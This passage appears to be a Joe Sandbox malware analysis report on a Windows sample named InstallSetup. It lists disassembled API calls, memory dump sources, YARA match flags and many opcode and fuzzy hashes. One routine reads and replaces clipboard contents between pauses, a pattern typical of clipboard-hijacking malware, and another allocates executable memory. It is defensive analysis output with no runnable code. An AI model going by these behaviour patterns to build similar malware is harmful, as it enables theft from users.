                                                                                                • Instruction Fuzzy Hash: 83319A15A6538094E330CFA0BC95A662330FF64B52F50653BD60CCB2B2E7A18587C35E
                                                                                                APIs
                                                                                                • _wcslen.LIBCMT ref: 0040298F
                                                                                                • __fassign.LIBCMT ref: 0040299F
                                                                                                  • Part of subcall function 00402823: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                • String ID:
                                                                                                • API String ID: 2843524283-0
                                                                                                • Opcode ID: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                • Instruction ID: f5c656a3c742482aaca5e7be5327d781ae1f97b048d34cfcbeac2439ecd5e81b
                                                                                                • Opcode Fuzzy Hash: 99f78a7314c7ad5a03a0c5f770c80a671dc835224e362237c5e255d3e1775ea8
                                                                                                • Instruction Fuzzy Hash: C901D6B1E0021C5ADB25FA25EC46BEE77689B41304F0041BFA605E31C1E9B85E85CAD8
                                                                                                APIs
                                                                                                • SetErrorMode.KERNEL32(00000400,?,?,00940223,?,?), ref: 00940E19
                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,00940223,?,?), ref: 00940E1E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorMode
                                                                                                • String ID:
                                                                                                • API String ID: 2340568224-0
                                                                                                • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                • Instruction ID: 263bd457605f750de3bf08e678698831de7a69c0df499e67b04a708b532cfd21
                                                                                                • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                • Instruction Fuzzy Hash: 82D01232245228B7DB002A94DC09BCEBB1CDF09BA2F008421FB0DE9080CBB09A4046EA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                • Instruction ID: 5858c2b1917228bc3ee007884971bc5cb621fb913b3acd2bc442863518e7715d
                                                                                                • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                                • Instruction Fuzzy Hash: 4051D531A00218AFDB10DF59C840BEA7BA1EFC9364F19919AF818AB391C779FD42C754
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fread_nolock
                                                                                                • String ID:
                                                                                                • API String ID: 2638373210-0
                                                                                                • Opcode ID: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                • Instruction ID: e1021867f2ec77c7d2f8cf192b2e918c2079a777806a714b314ab491ad94b1c1
                                                                                                • Opcode Fuzzy Hash: 330fcc4d7d5ac5b0b2ca1a235d838fa7146c9714e98705db01c69e2caad3ca42
                                                                                                • Instruction Fuzzy Hash: 5831ADB1604312AFC710DF2AC88092ABFA9BF84351F04893EFD4497390D739DA548B8A
                                                                                                APIs
                                                                                                • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402906
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                • String ID:
                                                                                                • API String ID: 323602529-0
                                                                                                • Opcode ID: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                • Instruction ID: a0c314b69e82cee7068a10c27dc1ba61f54dd3d6c342bb4161a68c9c894be626
                                                                                                • Opcode Fuzzy Hash: 9e105bc645d13b5be37bf51f85b07603bbf9c4582c9b25cdf04d4c3893a06c3e
                                                                                                • Instruction Fuzzy Hash: B03118B4D002199BDB14EFA5D881AEDBBB4BF08304F5085AEE415B3281DB786A49CF54
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: H_prolog3_catch
                                                                                                • String ID:
                                                                                                • API String ID: 3886170330-0
                                                                                                • Opcode ID: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                • Instruction ID: b71381d5bc9e259bdf0532d7d2dd1dfab3929909e68e206b89482bd8707b5f49
                                                                                                • Opcode Fuzzy Hash: 28d5133743d5d263c03eb5789c04d0db7473107e9a476edf8ad5427a5007d233
                                                                                                • Instruction Fuzzy Hash: 9F215E70600205DFCB11DF55C580EADBBB5BF48704F14C06EE815AB3A2C778AE50CB94
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: __wsopen_s
                                                                                                • String ID:
                                                                                                • API String ID: 3347428461-0
                                                                                                • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                • Instruction ID: ced19a79aea4b3e33dd998471e9e3f3b23a78e9704dbb7c6d54aa915c2495f90
                                                                                                • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                                • Instruction Fuzzy Hash: 3911187590420AAFCF05DF58E94199B7BF4FF4C314F10406AF819AB311D671EA25CBA9
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                • Instruction ID: e101c5f3f91c4e465480e224300ffd561ec2350ede5005b950df212ed8b6fbff
                                                                                                • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                                                • Instruction Fuzzy Hash: B6F0BE33910008FBCF159E96DC01DDF3B6EEF8D338F100116F91492150DA3ACA21ABA4
                                                                                                APIs
                                                                                                • RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 1279760036-0
                                                                                                • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                • Instruction ID: 0777d31d9fa185a8b849a759fdbdb2b75b345829f9b614c7a8fa7ff1ccc7c9d0
                                                                                                • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                                • Instruction Fuzzy Hash: AAE0E5313002207FD6303E675D07B5B36489F497A6F042127EC05A23D0DA6DEE0085AD
                                                                                                APIs
                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004103C7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: Exception@8Throw
                                                                                                • String ID:
                                                                                                • API String ID: 2005118841-0
                                                                                                • Opcode ID: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                • Instruction ID: a93cbdcc7b8cec239d3e65b0583cf012edeaa99edf8fc6fd77b2b60b17382ec4
                                                                                                • Opcode Fuzzy Hash: 0f8767ceb07e994d1f5b8eaac8dd392143d78e3b1b871650e8a1b44da905b8b1
                                                                                                • Instruction Fuzzy Hash: 58E09B3450430E76CB1476A5FC1595D376C6A00354B904237BC28654D1DF78F59D858D
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                                • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                                • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00C013C6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3922162162.0000000000C00000.00000040.00000020.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_c00000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction ID: e576860b550fa5ffe295d18b02c46c89f00a3e406aac4656111d33afdd47ce89
                                                                                                • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                • Instruction Fuzzy Hash: 0A113F79A00208EFDB01DF98C985E98BBF5EF08351F098094F9489B361D771EA50DF80
                                                                                                APIs
                                                                                                • __EH_prolog3_GS.LIBCMT ref: 0094194D
                                                                                                • Sleep.KERNEL32(00001541), ref: 00941957
                                                                                                  • Part of subcall function 0094CE77: _strlen.LIBCMT ref: 0094CE8E
                                                                                                • OpenClipboard.USER32(00000000), ref: 00941984
                                                                                                • GetClipboardData.USER32(00000001), ref: 00941994
                                                                                                • _strlen.LIBCMT ref: 009419B0
                                                                                                • _strlen.LIBCMT ref: 009419DF
                                                                                                • _strlen.LIBCMT ref: 00941B23
                                                                                                • EmptyClipboard.USER32 ref: 00941B39
                                                                                                • GlobalAlloc.KERNEL32(00000002,00000001), ref: 00941B46
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00941B70
                                                                                                • SetClipboardData.USER32(00000001,00000000), ref: 00941B79
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00941B80
                                                                                                • CloseClipboard.USER32 ref: 00941BA4
                                                                                                • Sleep.KERNEL32(000002D2), ref: 00941BAF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                • String ID: 4#E$i
                                                                                                • API String ID: 4246938166-2480119546
                                                                                                • Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                • Instruction ID: d9fd60c1dcad5aeeca595b4b11865b4212047a5b57cc49da7444e55ad4831aa0
                                                                                                • Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
                                                                                                • Instruction Fuzzy Hash: 6E510130C017849AE311DFA4ED46BBD7778FF6A302F045225E805A2163EB709AC1C76A
                                                                                                APIs
                                                                                                • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 0094239C
                                                                                                • GetClientRect.USER32(?,?), ref: 009423B1
                                                                                                • GetDC.USER32(?), ref: 009423B8
                                                                                                • CreateSolidBrush.GDI32(00646464), ref: 009423CB
                                                                                                • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 009423EA
                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 0094240B
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00942416
                                                                                                • MulDiv.KERNEL32(00000008,00000000), ref: 0094241F
                                                                                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 00942443
                                                                                                • SetBkMode.GDI32(?,00000001), ref: 009424CE
                                                                                                • _wcslen.LIBCMT ref: 009424E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                                • String ID:
                                                                                                • API String ID: 1529870607-0
                                                                                                • Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                • Instruction ID: 88e038fa589ca7568fefc881c6e68f3e85f6bc794c9b922a381119fe49074df2
                                                                                                • Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
                                                                                                • Instruction Fuzzy Hash: 2071DB72900218AFDB22DF68DD85FAEB7BCEB49751F0041A5B609E6155DA70AF80CF24
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: __floor_pentium4
                                                                                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                • API String ID: 4168288129-2761157908
                                                                                                • Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                • Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
                                                                                                • Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
                                                                                                • Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0097BCF4,?,00000000), ref: 0097BA6E
                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0097BCF4,?,00000000), ref: 0097BA97
                                                                                                • GetACP.KERNEL32(?,?,0097BCF4,?,00000000), ref: 0097BAAC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                • Instruction ID: 7aa5098a864fd96db0798d7766340d39f33cd437f29fa2c14f72519b661042f7
                                                                                                • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                • Instruction Fuzzy Hash: 2D217F33600105AAEB39AF54D901BA777EAEF94F60B56C465E90EDB100F732DE40C394
                                                                                                APIs
                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
                                                                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
                                                                                                • GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoLocale
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 2299586839-711371036
                                                                                                • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                • Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
                                                                                                • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                • Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
                                                                                                APIs
                                                                                                  • Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
                                                                                                  • Part of subcall function 00972141: _free.LIBCMT ref: 00972178
                                                                                                  • Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9
                                                                                                  • Part of subcall function 00972141: _free.LIBCMT ref: 009721A0
                                                                                                  • Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721AD
                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0097BCB5
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0097BD10
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0097BD1F
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,00970A1C,00000040,?,00970B3C,00000055,00000000,?,?,00000055,00000000), ref: 0097BD67
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00970A9C,00000040), ref: 0097BD86
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                • String ID:
                                                                                                • API String ID: 2287132625-0
                                                                                                • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                • Instruction ID: 7d7f1b7c961d6f8e22ec712ceb24d3f23b4731f9324d327dafdca1103036bdba
                                                                                                • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                • Instruction Fuzzy Hash: F15174739002099BDB11DFA9DC45BBE77B8FF55700F18C465F948E7190EB719A048B61
                                                                                                APIs
                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                                                                • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                                                                • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                                                                • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                • String ID:
                                                                                                • API String ID: 2287132625-0
                                                                                                • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                                                                • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C$C
                                                                                                • API String ID: 0-238425240
                                                                                                • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                                                                • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                                                                APIs
                                                                                                  • Part of subcall function 00972141: GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
                                                                                                  • Part of subcall function 00972141: _free.LIBCMT ref: 00972178
                                                                                                  • Part of subcall function 00972141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9
                                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00970A23,?,?,?,?,0097047A,?,00000004), ref: 0097B353
                                                                                                • _wcschr.LIBVCRUNTIME ref: 0097B3E3
                                                                                                • _wcschr.LIBVCRUNTIME ref: 0097B3F1
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00970A23,00000000,00970B43), ref: 0097B494
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                • String ID:
                                                                                                • API String ID: 2444527052-0
                                                                                                • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                • Instruction ID: 4503123228084f8632c8c2e3c94510b5f1778d03a3f6e1bdcfaac011ff4c7176
                                                                                                • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                                • Instruction Fuzzy Hash: BA61D673600606AADB24AB74CC46BBB73ACFF45710F14C42AF91DD7192EB74D94087A1
                                                                                                APIs
                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                                                                • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                                                                • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                                • String ID:
                                                                                                • API String ID: 2444527052-0
                                                                                                • Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                • Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
                                                                                                • Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
                                                                                                • Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
                                                                                                APIs
                                                                                                  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
                                                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorInfoLastLocale$_free
                                                                                                • String ID:
                                                                                                • API String ID: 2834031935-0
                                                                                                • Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
                                                                                                • Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
